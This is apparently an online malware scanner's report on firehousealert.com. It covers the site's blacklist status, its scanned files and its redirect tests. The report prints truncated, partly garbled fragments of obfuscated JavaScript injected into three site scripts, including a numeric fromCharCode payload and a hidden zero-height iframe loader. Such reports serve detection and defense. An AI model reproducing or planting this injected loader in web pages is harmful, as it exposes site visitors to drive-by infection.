Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=firehousealert.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://firehousealert.com/ | 200 OK Content-Length: 12228 Content-Type: text/html | clean |
http://firehousealert.com/mouseover.js | 200 OK Content-Length: 8500 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p,i,x; if(!d) d=document; if((p=n.ind if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://firehousealert.com/subnavig.js | 200 OK Content-Length: 7464 Content-Type: application/x-javascript | clean |
http://firehousealert.com/gen_subnavig.js | 200 OK Content-Length: 7498 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function setClearSubLayer(){}try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,192,235,192,580,624,525,690,230,486,295,60,160,192,160,192,590,58 if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://firehousealert.com/ml.js | 200 OK Content-Length: 7732 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function em_click(){ location.href="mailto:fas@firehousealert.com"; return true; } function ml_write(){ document.write('fas@firehousealert.com');} function ml_hp_write(isrc, iwidth, iheight){ document.write('<img title="fas@firehousealert.com" '+isrc+' '+iwidth+' '+iheight+' border=0>' );} try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5 if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://www.onlinesitedesigner.com/servlet/CounterServer?_patternID=5&_userID=34380&_pageID=1 | 200 OK Content-Length: 376 Content-Type: text/html | clean |
http://www.onlinesitedesigner.com/test404page.js | 404 Not Found Content-Length: 1946 Content-Type: text/html | clean |
http://sitebuilder.controlservers.net/reseller_staging/81724181/6.js | 200 OK Content-Length: 157 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: firehousealert.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 05 Sep 2014 02:39:21 GMT
Accept-Ranges: bytes
ETag: "42c93b6-2fc4-d9908980"
Server: Apache/2.0.52 (CentOS)
Content-Length: 12228
Content-Type: text/html
Last-Modified: Sun, 10 Apr 2011 03:13:58 GMT
...12228 bytes of data.
GET / HTTP/1.1
Host: firehousealert.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 05 Sep 2014 02:39:21 GMT
Accept-Ranges: bytes
ETag: "42c93b6-2fc4-d9908980"
Server: Apache/2.0.52 (CentOS)
Content-Length: 12228
Content-Type: text/html
Last-Modified: Sun, 10 Apr 2011 03:13:58 GMT
...12228 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: firehousealert.com
Referer: http://www.google.com/search?q=firehousealert.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: firehousealert.com
Referer: http://www.google.com/search?q=firehousealert.com
Result:
The result is similar to the first query. There are no suspicious redirects found.